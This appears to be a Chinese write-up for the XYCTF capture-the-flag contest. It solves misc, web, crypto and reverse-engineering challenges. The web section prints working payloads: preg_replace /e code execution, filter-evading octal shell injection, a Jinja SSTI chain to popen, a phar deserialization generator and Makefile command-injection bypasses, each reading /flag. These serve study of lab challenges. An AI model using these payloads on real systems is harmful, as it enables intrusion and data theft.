HWXj+kI2pS+5pSJhDS0oAzlQmziosSr7gUvdXppjSt8BNUTz8oLfE57NkCrVwBBgGul5hHzCcKqyG7U5LWMOXYtzloMsVvdZdPbMZyb+EgYF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oA3fVDcJt/sEYpz9U0yQTrgxTN0kF5G4xTJ5IKqYil2gK3Ml6usGZsucJXa6pCovoeaGSyZNq6T3aX1NOlb5Gt4gF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oAzlQmziosSr7gUvdXppjSt8PPIU/UwIkvINgvGw+oQMCCaOmO7bDsiSxD/r9w3RKRQEfMm/fv+a/5v/NWgauEpoF17+W/S1oLDgQcjGmP6CSHWXj+kI2pS+5pSJhDS0oA2QV+Gu05V1J2eVrbGhHB487Ns8HTVNYrll8P/Xve17NCaOmO7bDsiSxD/r9w3RKRQEfMm/fv+a/5v/NWgauEpoF17+W/S1oLDgQcjGmP6CS1yISnL45ZHzPjs5BGSboyDJXscweSL6g0ptOqql5vhY7Ns8HTVNYrll8P/Xve17NlyvQj9HulYK3sIMIiNTVrv/QYgLgLF9uO3y6uH800Gy0VvmX5a5S5ZEDlkBSgVrDb/KxZEoU9d83Nbzm7yH80p9xX+50C/29uVc+H6gx1gOTPv9mT6A8qfJoby4BoCS3by65j7WFf6d/XZX0KskX4t1SAjnDpnC8qWVbU6l6Zs9zWhqP0E6UVZEUMUcRZB43hzoYB6fvcRSs8WPoArwl6dY0JrIccPz30xmtzuOLZRKpeJ5IPHFZw5l6Zo68xW/fiYggRz/KqtgFCLvPQ+Lj+6YY1X0zgl8a3xzz5EI9efUoZd30RstP6oPDy17QzTwoaA1OLHZfyIntyJiT9r3x0kLELrvwIFczyH339IGVYqE4qA/Xsd3t/I+jStXiGGCnKCWoqABdtqk7Z22cIzn0lPAiqi9i3hd/IIgrlkygiofpTmBc34UjLRWWFjQgmDQZ8em1hDlVfgd+/93D4BVIn36xgcg2RtYCx2GmXmg5JwRj5pxcBzyOVie5m0U4zHD6Rt0T8GAvCiCf9hhYkBi7lVHe4Sb7op9fpgfXrNunluSOwxS0NlaBKwa1gvE6/BNy2CI2Uv2y4jlPTdIuCNnWbCJsTSczfPJg5PVfyXykQtg4qA/Xsd3t/I+jStXiGGCnKCWoqABdtqk7Z22cIzn0lLw/priteJqeyg6psALOE5HEboNbEbOkupEDq1HXrfGn2CI2Uv2y4jlPTdIuCNnWbCJsTSczfPJg5PVfyXykQtg4qA/Xsd3t/I+jStXiGGCnctoLlIFVYoOgnQM/2Rz5g4eIxaKQoZ+9cRB51n5yxl/BJQA5860fCnVVFSyvS40JdaogrK4AcB+C0gsnUbXVyeX1Kq+MwIHo812Z/0GIAiR+HkJQwgmO7qkogz1vcP4+q7EHUnfXquRurKvZ5jMHz4eIxaKQoZ+9cRB51n5yxl9g/v4Djdoq+YadpY2vIGrZ2CI2Uv2y4jlPTdIuCNnWbDVfnXQwmbz3jY+JyZm4sKgHDLAxJSG/IIAKk2q5C0f6l6L6v86Nra6TiDC3FBOzBEMzapQz6v9XkJfLFhywMtFLbz4PXsEvXiaFbSooHN8xVDDfRmWQyINRSNJguwiY9ElfGZnb6gHT2U5ENwxhxpxW+5Jnwn3zMCBub7HDwqyOSl5l8hKoU5obcdof5SuB3A==

asrmorfe反过来可以看到e from rsa

e=65537

https://txtmoji.com/

image-20240430202843396

1
432000023200001320000211000003200004320000313000021100001130000113000034200003320000
1
2
3
可以看到上面的字符串基本都是后面4个0然后前面3位在变化,显然7个一组,类似ASCII,根据数字范围基本确定是五进制,计算一下

4320000 2320000 1320000 21100000 320000 4320000 3130000 2110000 1130000 1130000 3420000 3320000
1
2
3
4
5
6
7
8
9
strs="432000023200001320000211000003200004320000313000021100001130000113000034200003320000"

for i in range(len(strs)//7):
num=strs[7*i:7*i+7]
n=0
for j in range(7):
# print(num[-j])
n=n+int(num[-(j+1)])*(5**j)
print(chr(n),end="")

得到了乱码,但是结果是有的,把密文逆一下试试

1
2
3
4
5
6
7
8
9
10
str="432000023200001320000211000003200004320000313000021100001130000113000034200003320000"
strs = str[::-1]
for i in range(len(strs)//7):
num=strs[7*i:7*i+7]
n=0
for j in range(7):
# print(num[-j])
n=n+int(num[-(j+1)])*(5**j)
print(chr(n),end="")
# DIQQ SEA BCE

已经看到结果了RCB AES QQID

得知是AES(ECB模式加密),后面的QQID应该是key。结合题目描述可知QQ群的ID = 798794707

https://the-x.cn/cryptography/Aes.aspx

image-20240430203657396

可以看到解密后末尾提示:Have you heard of Malbolge?

https://malbolge.doleczek.pl/

image-20240430203744044

XYCTF{It’s_Easy!_Special_Signature}

WEB

ezhttp

非常ez的http

image-20240402110820355

dirsearch扫一下

image-20240402110834341

访问/robots.txt

1
2
User-agent: *
Disallow: /l0g1n.txt

访问/l0g1n.txt

1
2
username: XYCTF
password: @JOILha!wuigqi123$
1
2
3
4
5
6
7
User-Agent: XYCTF
Origin: http://xyctf.top:49206
client-IP: 127.0.0.1
via: ymzx.qq.com
Cookie: XYCTF

password=%40JOILha%21wuigqi123%24&username=XYCTF

warm up

刚起床没什么状态做题,先简单热个身吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
include 'next.php';
highlight_file(__FILE__);
$XYCTF = "Warm up";
extract($_GET);

if (isset($_GET['val1']) && isset($_GET['val2']) && $_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2'])) {
echo "ez" . "<br>";
} else {
die("什么情况,这么基础的md5做不来");
}

if (isset($md5) && $md5 == md5($md5)) {
echo "ezez" . "<br>";
} else {
die("什么情况,这么基础的md5做不来");
}

if ($XY == $XYCTF) {
if ($XY != "XYCTF_550102591" && md5($XY) == md5("XYCTF_550102591")) {
echo $level2;
} else {
die("什么情况,这么基础的md5做不来");
}
} else {
die("学这么久,传参不会传?");
}

什么情况,这么基础的md5做不来
1
?val1[]=1&val2[]=2&md5=0e215962017&XYCTF=QNKCDZO&XY=QNKCDZO

image-20240401185720759

1
2
3
4
5
6
7
8
9
10
<?php
highlight_file(__FILE__);
if (isset($_POST['a']) && !preg_match('/[0-9]/', $_POST['a']) && intval($_POST['a'])) {
echo "操作你O.o";
echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']); // 我可不会像别人一样设置10来个level
} else {
die("有点汗流浃背");
}

有点汗流浃背
1
2
3
4
/LLeeevvveeelll222.php?a=/abc/e&b=system('cat /flag')&c=/abc/e

POST:
a[]=1

image-20240402124606045

牢牢记住,逝者为大

牢大在直升飞机上,快要坠机了,你能在有限的操作下救下牢大吗

如果flag文件为空,可以重启靶机,一般两次没打出来就是你payload有问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
highlight_file(__FILE__);
function Kobe($cmd)
{
if (strlen($cmd) > 13) {
die("see you again~");
}
if (preg_match("/echo|exec|eval|system|fputs|\.|\/|\\|/i", $cmd)) {
die("肘死你");
}
foreach ($_GET as $val_name => $val_val) {
if (preg_match("/bin|mv|cp|ls|\||f|a|l|\?|\*|\>/i", $val_val)) {
return "what can i say";
}
}
return $cmd;
}

$cmd = Kobe($_GET['cmd']);
echo "#man," . $cmd . ",manba out";
echo "<br>";
eval("#man," . $cmd . ",mamba out");

#man,,manba out

用 GET[‘cmd’ 躲避长度限制

1
?cmd=%0d`$_GET[c]`;%23&c=cp /flag nn

将根目录下的flag放到nn里面,自动当前目录生成nn文件

但这里还有flag是被过滤的,所以需要转化下成八进制绕过 空格用+表示

1
?cmd=%0d`$_GET[c]`;%23&c=$'\143\160'+$'\57\146\154\141\147'+$'\156\156'

然后访问nn,可以下载得到。

XYCTF{268b1b1b-dae0-4800-8db4-10eca0a59efb}

ez!Make

image-20240401114206573

ezmake

makefile好像…还挺简单的?_xwx

直接访问/flag下载得到flag

预期解

1
source flag 或者 echo $(shell cat flag)

ez?Make

真的…简单吗?...@xa$<x{w_x

rce绕过

1
sort `echo 2F666c6167 | xxd -r -p`

image-20240425144518360

或者

1
cd ..&&cd ..&&cd ..&&cd ..&&cd bin&&echo "Y2F0IC9mbGFn"|b[!b-z]se64 -d|b[!bz]sh

εZ?¿м@Kε¿?

Μακεϝ1LE>1s<S0<ϜxxΚ1ηG_ξ2!@<>#>%%#!$*&^(!

连连看到底是连连什么看

到底连连什么看才对呢?(flag在根目录/flag下)

我是一个复读机

我是一个只会说英文的复读机

登录用户名是admin

附件下载字典

image-20240425145016551

admin 密码asdqwe

SSTI注入题,用特殊字符﹛﹜绕过对{}的过滤

Payload:

1
?sentence=﹛(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()﹜&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=cat /flag

image-20240425145218828

ezmd5

你刚入门学的第一个php知识点是md5吗

这个只能上传jpg

https://www.win.tue.nl/hashclash/

新建一个jpg 然后fastcoll_v1.0.0.5.exe 1.jpg

会生成

image-20240401145026366

上传上去

image-20240401144921000

pharme

ezRCE

遇到这么ez的RCE你就偷着乐吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
highlight_file(__FILE__);
function waf($cmd){
$white_list = ['0','1','2','3','4','5','6','7','8','9','\\','\'','$','<'];
$cmd_char = str_split($cmd);
foreach($cmd_char as $char){
if (!in_array($char, $white_list)){
die("really ez?");
}
}
return $cmd;
}
$cmd=waf($_GET["cmd"]);
system($cmd);
really ez?

主要是八进制绕过,$’ ‘ 会根据里面的形式进行解析对应进制

cat /flag

1
?cmd=$'\143\141\164'<$'\57\146\154\141\147' 

pharme

do you know phar?

生成 phar 包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
class evil{
public $cmd;
public $a;
}
$evilClass = new evil();
$evilClass->cmd = 'system(next(getallheaders()));__halt_compiler();';
$a = new SplStack();
$a -> push($evilClass);

$phar = new Phar("phar123.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering();
?>

CRYPTO

factor1

这个e咋比n还大啊

1
2
3
4
5
6
7
8
9
10
11
12
13
import gmpy2
import hashlib
from Crypto.Util.number import *

p = getPrime(512)
q = getPrime(512)
d = getPrime(512)
e = gmpy2.invert(d, (p**3 - 1) * (q**3 - 1))
flag = "XYCTF{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"
print(e)
print(p * q)
# 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
# 99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-

import gmpy2
import libnum
import hashlib
import random


def continuedFra(x, y):
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf


def gradualFra(cf):
numerator = 0
denominator = 1
for x in cf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator


def solve_pq(a, b, c):
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)


def getGradualFra(cf):
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf


def wienerAttack(e, n):
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d


e = 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163
n = 99075185389443078008327214328328747792385153883836599753096971412377366865826254033534293886034828804219037466246175526347014045811852531994537520303063113985486063022444972761276531422538694915030159420989401280012025249129111871649831185047820236417385693285461420040134313833571949090757635806658958193793

d = wienerAttack(e, n ** 3)

print('d=', d)
d = 8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347

e = 172005065945326769176157335849432320425605083524943730546805772515111751580759726759492349719668775270727323745284785341119685198468883978645793770975366048506237371435027612758232099414404389043740306443065413069994232238075194102578269859784981454218948784071599231415554297361219709787507633404217550013282713899284609273532223781487419770338416653260109238572639243087280632577902857385265070736208291583497988891353312351322545840742380550393294960815728021248513046077985900158814037534487146730483099151396746751774427787635287611736111679074330407715700153025952858666841328055071403960165321273972935204988906850585454805923440635864200149694398767776539993952528995717480620593326867245714074205285828967234591508039849777840636255379730281105670496110061909219669860172557450779495125345533232776767292561378244884362014224844319802810586344516400297830227894063759083198761120293919537342405893653545157892446163

k = e * d - 1

r = k
t = 0
while True:
r = r // 2
t += 1
if r % 2 == 1:
break

success = False

for i in range(1, 101):
g = random.randint(0, n)
y = pow(g, r, n)
if y == 1 or y == n - 1:
continue

for j in range(1, t):
x = pow(y, 2, n)
if x == 1:
success = True
break
elif x == n - 1:
continue
else:
y = x

if success:
break
else:
continue

if success:
p = libnum.gcd(y - 1, n)
q = n // p
print('P: ' + '%s' % p)
print('Q: ' + '%s' % q)
hash_result = hashlib.md5(str(p + q).encode()).hexdigest()

print(b'XYCTF{' + hash_result.encode() + b'}')
else:
print('Cannot compute P and Q')
1
2
3
4
d= 8447122254265361577759220083550460887840558233627984117576685838469227480934556534673167325385487344741530262745308367064419215281251764917289925433582347
P: 10754959493573546439510276829300246769373124436128170955050379041986504869221750743052397622171703140881050431144683659643071578143360949942206693325622779
Q: 9212046353930376594996890089494718736894378991991381248242532319628627449681664076081705664941905594411935750003102856235503684466394327681725704255564467
b'XYCTF{a83211a70e18145a59671c08ddc67ba4}'

REVERSE

聪明的信使

传统加密,童叟无欺。

ida打开

image-20240401164239741

加密函数如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
char Str1[100]; // [esp+18h] [ebp-68h] BYREF
int v5; // [esp+7Ch] [ebp-4h]

__main();
v5 = 9;
printf("Input your flag:");
scanf("%s", Str1);
encrypt(Str1, v5);
if ( !strcmp(Str1, "oujp{H0d_TwXf_Lahyc0_14_e3ah_Rvy0ac@wc!}") )
printf("Good job!");
else
printf("Try again!");
return 0;
}

偏移量为9

flag{Y0u_KnOw_Crypt0_14_v3ry_Imp0rt@nt!}

喵喵喵的flag碎了一地

1
2
3
4
5
喵喵喵的flag碎了一地>miaomiaomiao.exe
Hint:
1. Open in IDA and Learn about `Strings` to find the first part of the flag
2. Learn about `Functions` to find the second part of the flag which is the name of a function
3. The hint for the last part is in the function you found in the second part

主函数,告诉你第一段再 string 里面

第二段在函数名中

第三段在第二段有提示

shitf+F12

image-20240402133728974

flag{My_fl@g_h4s_

然后函数段里面有

image-20240402135429080

br0ken_4parT_

image-20240402135754644

进入函数得到提示:Xref 就是调用的意思 选中函数名 x 查看调用

image-20240402135810125

image-20240402135823981

可以看到一段 flag,但其实这不全编界面

image-20240402140826056

Bu7_Y0u_c@n_f1x_1t!}

flag{My_fl@g_h4s_br0ken_4parT_Bu7_Y0u_c@n_f1x_1t!}

你是真的大学生吗?

你是冤种大学生吗?

汇编题,所以无法反编译,读汇编代码